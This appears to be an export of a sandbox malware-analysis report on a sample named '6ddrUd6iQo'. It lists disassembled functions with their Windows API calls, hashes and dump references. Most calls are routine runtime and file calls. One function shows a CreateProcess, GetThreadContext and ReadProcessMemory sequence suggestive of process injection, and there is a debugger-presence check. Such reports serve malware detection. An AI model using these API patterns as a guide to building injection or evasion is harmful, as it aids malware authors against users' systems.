Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID:
String ID: CALL
API String ID: 0-4196123274
Opcode ID: b4c1268570c4765c10421032c5b00adbb3ec49aa30931b1ddf7d5f6771f45c13
Instruction ID: 09e87997ad2d80ee526cb218943ef1f6827d1812690df5125c789df95d58f589
Opcode Fuzzy Hash: b4c1268570c4765c10421032c5b00adbb3ec49aa30931b1ddf7d5f6771f45c13
Instruction Fuzzy Hash: 8F225974528251DFC729DF14C490B6ABBE1BF48304F15896EE88A8B362D771ED91CF82

Function 002D492E Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

745EC8D0.UXTHEME ref: 002D4992

Part of subcall function 002F35AC: __lock.LIBCMT ref: 002F35B2
Part of subcall function 002F35AC: RtlDecodePointer.NTDLL(00000001), ref: 002F35BE
Part of subcall function 002F35AC: RtlEncodePointer.NTDLL(?), ref: 002F35C9

Part of subcall function 002D4A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 002D4A73
Part of subcall function 002D4A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 002D4A88

Part of subcall function 002D3B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 002D3B7A
Part of subcall function 002D3B4C: IsDebuggerPresent.KERNEL32 ref: 002D3B8C
Part of subcall function 002D3B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,003962F8,003962E0,?,?), ref: 002D3BFD
Part of subcall function 002D3B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 002D3C81

SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 002D49D2

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectoryPointer$DebuggerDecodeEncodeFullNamePathPresent__lock
String ID:
API String ID: 2688871447-0
Opcode ID: e3e124ca23bde103f73b17a587863c860c565666e129815db74d2a9a8724cfc6
Instruction ID: ae2d0534ab15bc834833f6167bce98f71288f727b4ae3272e8e110d3c188700e
Opcode Fuzzy Hash: e3e124ca23bde103f73b17a587863c860c565666e129815db74d2a9a8724cfc6
Instruction Fuzzy Hash: 35116A719283119BC701EF29E80691AFBF8EB98750F00891FF085832B1DB719965CB96

Function 002D5DF9 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,002D5981,?,?,?,?), ref: 002D5E27
CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,002D5981,?,?,?,?), ref: 0030E19C

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 1632a84ff06d21a1fa0097a64b3907b6ca195b2385a51e41958a754e503a4445
Instruction ID: ccfa1b57867e7fb40624838d8df1055f71d5f8b25b6dc0db4b6d58cea2e599f0
Opcode Fuzzy Hash: 1632a84ff06d21a1fa0097a64b3907b6ca195b2385a51e41958a754e503a4445
Instruction Fuzzy Hash: 6001B570254719BEF3251E24CC8AF663B9CEB01768F10C31ABAE55A2E0C6F41E558B50

Function 002F582D Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 002F585C
__lock_file.LIBCMT ref: 002F587D

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: __lock_file_memset
String ID:
API String ID: 26237723-0
Opcode ID: cabd9b9dbc22fcf5b4190140183b9fe140413c7aaf8ad2350e39deb46e1f683e
Instruction ID: 1cfff78e3028f54b93d12a5c3e495861f7d8dfa371bd000b94bfc9de4e468e6d
Opcode Fuzzy Hash: cabd9b9dbc22fcf5b4190140183b9fe140413c7aaf8ad2350e39deb46e1f683e
Instruction Fuzzy Hash: 01015E71820A1DABCF12AF699D059AEFA61AF403E0B144235BB245B1A1DB318A71DF91

Function 002F55D6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 002F8D68: __getptd_noexit.LIBCMT ref: 002F8D68

__lock_file.LIBCMT ref: 002F561B

Part of subcall function 002F6E4E: __lock.LIBCMT ref: 002F6E71

__fclose_nolock.LIBCMT ref: 002F5626

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: 0e2b07b69d70926f674321fd3d5710b19ed78c9ba225f4eca357bdd351fea54f
Instruction ID: e6e925ffc4776559bd67cccf2afe693c85346df11d1f84668c0ce74629c37ea7
Opcode Fuzzy Hash: 0e2b07b69d70926f674321fd3d5710b19ed78c9ba225f4eca357bdd351fea54f
Instruction Fuzzy Hash: 99F0F631820A1D9AD7206F75880277EE6A45F007B4F544225E720EB0C1CF7C49218F41

Function 002D81C1 Relevance: 2.6, APIs: 2, Instructions: 54COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,?,?,?,002D558F,?,?,?,?,?), ref: 002D81DA
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,?,?,002D558F,?,?,?,?,?), ref: 002D820D

Part of subcall function 002D78AD: _memmove.LIBCMT ref: 002D78E9

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: ByteCharMultiWide$_memmove
String ID:
API String ID: 3033907384-0
Opcode ID: aa237e0364f00aa42bd9c505499551b9d91eb27463185b4c40cf502ea66c6127
Instruction ID: 3097a31f923d9243f0b4911320f554c32fc5af7f88a281a29cff4f84bbc9a5a5
Opcode Fuzzy Hash: aa237e0364f00aa42bd9c505499551b9d91eb27463185b4c40cf502ea66c6127
Instruction Fuzzy Hash: 8801AD31215604BFEB256A25DD4AF7B7B6CEB89760F10812AFE05CD2A1EE209C109A71

Function 018F129D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 018F1A5B
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 018F1AF1
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 018F1B13

Memory Dump Source

Source File: 00000000.00000002.1661604968.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18f0000_6ddrUd6iQo.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
Instruction ID: 1f99e3fd6fc0e54ee9c4d6bbdfef76bba4cee19d14d820b3df79ef41bcf84658
Opcode Fuzzy Hash: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
Instruction Fuzzy Hash: 2512DD24E24658C6EB24DF64D8547DEB232EF68300F1090ED910DEB7A5E77A4F81CB5A

Function 002E2123 Relevance: 1.7, APIs: 1, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e7af1d4df756bd34c87c7c4c63cd1b7fbcaf6b63039e148e98b0bb5155540e6
Instruction ID: b43f3c753be6f22a3bbe70fcf7a9f1a9fbd55ec6da3aaa9c8336a4558f229138
Opcode Fuzzy Hash: 5e7af1d4df756bd34c87c7c4c63cd1b7fbcaf6b63039e148e98b0bb5155540e6
Instruction Fuzzy Hash: 5751AF30620614EFCF15EF58C992FAE77A5AF48310F158169F906AB382CB30EE54CB50

Function 002D766F Relevance: 1.6, APIs: 1, Instructions: 103COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 002D774A

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 11c29b0f3fe12c11882c4c838d6bb1aca2612202df9aecf9aabe0f6fa49cd225
Instruction ID: ec4df052c11f6db5b419433ecfe4f37cdb282bf542cd1921f7c17dc04000f096
Opcode Fuzzy Hash: 11c29b0f3fe12c11882c4c838d6bb1aca2612202df9aecf9aabe0f6fa49cd225
Instruction Fuzzy Hash: DA31B679628A03DFD7249F18C090921F7A4FF08350714C56EE9498B7A5FB74DCA1CB84

Function 002D5C4E Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 002D5CF6

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: c98b0a5b558cc80ae7296be51cabef9b44bfee8e0b2f74aa5415da8983f990bd
Instruction ID: 9ce43566b7d3d42ed1437b4d138b7c839c52d06e298f360cdff3e7b2f5ad3356
Opcode Fuzzy Hash: c98b0a5b558cc80ae7296be51cabef9b44bfee8e0b2f74aa5415da8983f990bd
Instruction Fuzzy Hash: 45313E71A20B1AAFCB18DF29C484A5DB7B5FF48310F15861BE81993714D7B1AD60DB90

Function 003100D6 Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 003100E1

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: f1fc7e1b6eb06aad76c4d21dabd6073e5dec928224f2cd1ec3ed27cf90596433
Instruction ID: b71e7ef596fe2ea34ee204f822885d58271032b7c540a36f9f72b3dd1f998dc9
Opcode Fuzzy Hash: f1fc7e1b6eb06aad76c4d21dabd6073e5dec928224f2cd1ec3ed27cf90596433
Instruction Fuzzy Hash: F7411274518351DFDB29DF14C484B1ABBE0AF48308F0988ADE8898B362C776EC95CF52

Function 002D4F3D Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 002D4D13: FreeLibrary.KERNEL32(00000000,?), ref: 002D4D4D

Part of subcall function 002F548B: __wfsopen.LIBCMT ref: 002F5496

LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,003962F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 002D4F6F

Part of subcall function 002D4CC8: FreeLibrary.KERNEL32(00000000), ref: 002D4D02

Part of subcall function 002D4DD0: _memmove.LIBCMT ref: 002D4E1A

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: Library$Free$Load__wfsopen_memmove
String ID:
API String ID: 1396898556-0
Opcode ID: d7d57faf18f6d68ca25725a19e64dce8bb05f80c99b06b8b42428fec28f9e4cf
Instruction ID: d18429c2c9c043a949297e0a74fd7bf54dc945c224b20936b72e94374e023b9e
Opcode Fuzzy Hash: d7d57faf18f6d68ca25725a19e64dce8bb05f80c99b06b8b42428fec28f9e4cf
Instruction Fuzzy Hash: 07112732620309AFCB21BF70CC12FAE77A99F44701F10842BF541A63E1DAB18E249F90

Function 003101AF Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 003101BB

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: fec1cd3235621ad285b944326c98cfb94643c6d9443658db873316b1a498570b
Instruction ID: 0be1ad6b72559c63a84b35c7d2f2872520d8fec310e3afba706c648f5d746731
Opcode Fuzzy Hash: fec1cd3235621ad285b944326c98cfb94643c6d9443658db873316b1a498570b
Instruction Fuzzy Hash: 93212FB4528341DFCB29DF14C484E1ABBE0BF88304F05896DE98A47761C771E8A9CF92

Function 002D78AD Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 002D78E9

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: e0b0f1feff7007f9a685850875a5a6e1ea6a23f504afe070e1a0459631d1335c
Instruction ID: 8f15192f5e9f701b5e5e63ecc3545030d5aebf2738daa47445116f232cd4575a
Opcode Fuzzy Hash: e0b0f1feff7007f9a685850875a5a6e1ea6a23f504afe070e1a0459631d1335c
Instruction Fuzzy Hash: 2C118672229216ABC714AF2CD891D7AB399EF45360714422BFD19C7395EF359C309B90

Function 002D5D20 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,002D5807,00000000,00010000,00000000,00000000,00000000,00000000), ref: 002D5D76

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 4752da1058a54d6f8b5e4e845f4c05c4ab28d10995373423ae76c468909443be
Instruction ID: 3e5984123e1dfdaee752a3919e3943cddbb332a242e9c51f93def3ee4521ea5b
Opcode Fuzzy Hash: 4752da1058a54d6f8b5e4e845f4c05c4ab28d10995373423ae76c468909443be
Instruction Fuzzy Hash: 28113631210B159FE3308F15C888B62B7EAEF45760F10C92EE5AA86A50D7B0ED55CF60

Function 002F4A93 Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 002F4AD6

Part of subcall function 002F8D68: __getptd_noexit.LIBCMT ref: 002F8D68

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: __getptd_noexit__lock_file
String ID:
API String ID: 2597487223-0
Opcode ID: 7d55c03f1f318a90545dfcbc5e62d52eae8772d8bc1547868b75bcf213040985
Instruction ID: 74dabd33b6bc8be58a79f8b12dc978ab93700e752f5dcf4356c878df2001636d
Opcode Fuzzy Hash: 7d55c03f1f318a90545dfcbc5e62d52eae8772d8bc1547868b75bcf213040985
Instruction Fuzzy Hash: 44F06D3196020D9BDB51BF64C8067BFF665AF003A9F044524B6249A191DBB88A71DF51

Function 002D4FAA Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,003962F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 002D4FDE

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 643c6d467d088cbeaf87e32a997480126affa940ad19608d4e4e8ad7164c484a
Instruction ID: d6f2b11bf58d3da1db06fe8d4d728b681da6d2ffb91eed122240be4e1b04ea06
Opcode Fuzzy Hash: 643c6d467d088cbeaf87e32a997480126affa940ad19608d4e4e8ad7164c484a
Instruction Fuzzy Hash: 35F01571525B12CFCB34AF64E494822BBE5AF043293208A3EE2D782B20C771AD60DF40

Function 002F09D5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 002F09F4

Part of subcall function 002D7D2C: _memmove.LIBCMT ref: 002D7D66

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: LongNamePath_memmove
String ID:
API String ID: 2514874351-0
